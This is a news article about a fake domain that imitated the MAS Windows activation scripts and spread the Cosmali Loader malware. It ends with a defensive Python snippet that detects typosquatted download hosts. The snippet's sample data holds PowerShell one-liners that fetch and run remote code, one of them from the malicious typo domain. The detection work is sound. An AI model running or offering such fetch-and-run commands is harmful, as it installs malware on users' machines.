Users have discovered a fake domain posing as the MAS utility (Microsoft Activation Scripts) from the Massgrave project. The domain was used to distribute malicious PowerShell scripts that infected Windows systems with the Cosmali Loader malware.
As Bleeping Computer reports, this week Reddit users started posting (1, 2) about strange pop-up notifications appearing on their computers. These notifications reported that the system was infected with Cosmali Loader malware and even explained the reason — a typo made while entering the Windows activation command.
“You are infected with malware called Cosmali Loader because you mistakenly typed get.activated.win as get.activate[.]win when activating Windows using PowerShell.
The malware control panel is not secure, and anyone viewing it has access to your computer.
Reinstall Windows and don’t repeat this mistake next time.
To confirm that your computer is infected, check Task Manager and look for suspicious PowerShell processes,” read the notification in one of the cases.
As discovered by a researcher known as RussianPanda, these messages are linked to the open-source malware loader Cosmali Loader. This malicious tool had previously come under the scrutiny of GDATA analyst Karsten Hahn, who also wrote about similar pop-up windows.
According to data from RussianPanda, Cosmali Loader delivered cryptominers and the XWorm remote access trojan to infected systems.
However, it is still unclear who exactly was sending the warnings to infected users. It is assumed that this may have been done by an anonymous cybersecurity researcher who somehow gained access to the malware’s C&C panel and decided to use it to notify victims of the compromise.
MAS is a well-known set of open-source PowerShell scripts that automate the activation of Windows and Office. The tool uses HWID activation, KMS emulation, and relies on Ohook and TSforge to bypass protection. The project is maintained by the Massgrave team and the community, and is hosted on GitHub.
It’s worth noting that Microsoft considers MAS a pirated tool that activates products without a license using unauthorized methods. And although GitHub (which is owned by Microsoft) does not remove these tools, the company’s developers recently began cracking down on KMS-based Windows activation.
Massgrave representatives have already warned users about the get.activate[.]win threat and urged everyone to double-check the commands they type before executing them.
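The "double-check the command" advice can be automated on the defender's side: a small check over PowerShell history or process-creation command lines that flags download hosts within one or two edits of get.activated.win, such as the get.activate[.]win typo reported above. This is an added example written for this article, not code from the MAS project or from any of the researchers mentioned; the sample command lines are constructed, and the edit-distance threshold is an assumption.

```python
import re
from urllib.parse import urlparse

# Legitimate host of the MAS one-liner, as named in the article; the typo
# variant with one letter dropped is the one the article reports.
LEGIT_HOST = "get.activated.win"

# Constructed sample command lines (not real logs), in the shape of a
# PowerShell history file or a process-creation event's CommandLine field.
SAMPLE_LINES = [
    "powershell.exe irm https://get.activated.win | iex",
    "powershell.exe irm https://get.activate.win | iex",
    'powershell.exe -c "irm https://get.activated.win/ | iex"',
    "powershell.exe Get-Process",
]

URL_RE = re.compile(r"https?://[^\s\"'|<>]+", re.IGNORECASE)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot one- or two-character typos of the host."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def extract_hosts(line: str) -> list:
    """Hostnames of every URL in a command line (urlparse lower-cases them)."""
    hosts = []
    for url in URL_RE.findall(line):
        host = urlparse(url).hostname
        if host:
            hosts.append(host)
    return hosts


def classify(line: str, legit: str = LEGIT_HOST, max_distance: int = 2) -> tuple:
    """Return (verdict, host): 'lookalike' wins over 'legit'; 'none' if no URL."""
    verdict, found = "none", None
    for host in extract_hosts(line):
        distance = levenshtein(host, legit)
        if 0 < distance <= max_distance:   # near-miss of the real host: typosquat
            return ("lookalike", host)
        if distance == 0:
            verdict, found = "legit", host
    return (verdict, found)


def scan(lines) -> list:
    """Only the (line, host) pairs whose download host is a near-miss of the real one."""
    return [(line, classify(line)[1]) for line in lines if classify(line)[0] == "lookalike"]
```

Running `scan(SAMPLE_LINES)` returns just the get.activate.win line; the same function can be pointed at the PSReadLine history file or exported 4688/Sysmon command-line fields.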